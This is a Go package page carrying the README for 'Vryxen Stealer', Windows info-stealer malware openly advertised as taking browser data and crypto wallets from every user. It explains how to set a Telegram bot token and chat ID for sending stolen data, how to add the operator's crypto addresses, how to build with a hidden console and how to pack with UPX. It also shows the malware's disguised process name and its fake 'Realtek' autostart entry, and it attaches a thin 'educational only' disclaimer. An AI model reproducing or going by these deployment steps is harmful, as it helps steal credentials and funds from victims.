vryxen

module
v0.0.0-...-c036089 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Dec 12, 2025 License: MIT

README

Forks Stargazers Issues MIT License

Vryxen Stealer

Go-written Malware Targeting Windows systems, extracting User Data from Browsers, Crypto Wallets and more, from every user on every disk.


Table of Contents
  1. Getting Started
  2. Usage
  3. Preview
  4. Remove
  5. Contributing
  6. License
  7. Contact
  8. Acknowledgments
  9. Disclaimer

Getting started

Prerequisites

Installation

To install this project using Git, follow these steps:

  • Clone the Repository:
git clone https://github.com/unf6/vryxen
  • Navigate to the Project Directory:
cd vryxen

https://www.youtube.com/watch?v=wM5A8ew2EO0&t=5s

Usage

You can use the Project template:

  • Open cmd/main.go and edit config with your Telegram Bot Token, Your Chat Id, and your crypto addresses

  • Build the template: (reduce binary size by using -s -w)

go build -ldflags "-s -w"
  • You can hide the console without hideconsole module (you must remove common.IsAlreadyRunning() check from cmd/main.go before) by running
go build -ldflags "-s -w -H=windowsgui"
  • You can also optionally pack the output executable with UPX which will reduce the binary size from ~10MB to ~3MB. To do this, install UPX and run
upx.exe --ultra-brute vryxen.exe
  • You can also use vryxen in your own Go code. Just import the desired module like this:
package main

import "github.com/unf6/vryxen/internal/hc"

func main() {
  HideConsole.Hide()
}

Preview

Remove

This guide will help you removing vryxen from your system

  1. Open powershell as administrator

  2. Kill processes that could be vryxen

taskkill /f /t /im vryxen.exe
taskkill /f /t /im SecurityHealthSystray.exe

(use tasklist to list all running processes, vryxen.exe and SecurityHealthSystray.exe are the default names)

  1. Remove vryxen from startup
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Realtek HD Audio Universal Service" /f

(Realtek HD Audio Universal Service is the default name)

  1. Enable Windows defender:

You can do it by running this .bat script (I'm not the developer behind it, make sure the file does not contain malware)

Contributing

Contributions to this project are welcome! Feel free to open issues, submit pull requests, or suggest improvements. Make sure to follow the Contributing Guidelines

You can also support this project development by leaving a star ⭐ or by donating me. Every little tip helps!

BTC: bc1qlhqlc4fy3wd98m8qmv05zu059j6am9jh4kj4v2

License

This library is released under the MIT License. See LICENSE file for more informations.

Contact

If you have any questions or need further assistance, please contact @xretic:matrix.org

Acknowledgments

Orginal Author


Disclaimer

Important Notice: This tool is intended for educational purposes only.

This software, referred to as xretic, is provided strictly for educational and research purposes. Under no circumstances should this tool be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions.

Usage Responsibility:

By accessing and using this tool, you acknowledge that you are solely responsible for your actions. Any misuse of this software is strictly prohibited, and the creator (xretic) disclaims any responsibility for how this tool is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction.

No Liability:

The creator (xretic) of this tool shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use the tool.

No Support:

The creator (xretic) will not provide any support, guidance, or assistance related to the misuse of this tool. Any inquiries regarding malicious activities will be ignored.

Acceptance of Terms:

By using this tool, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use the software.

Jump to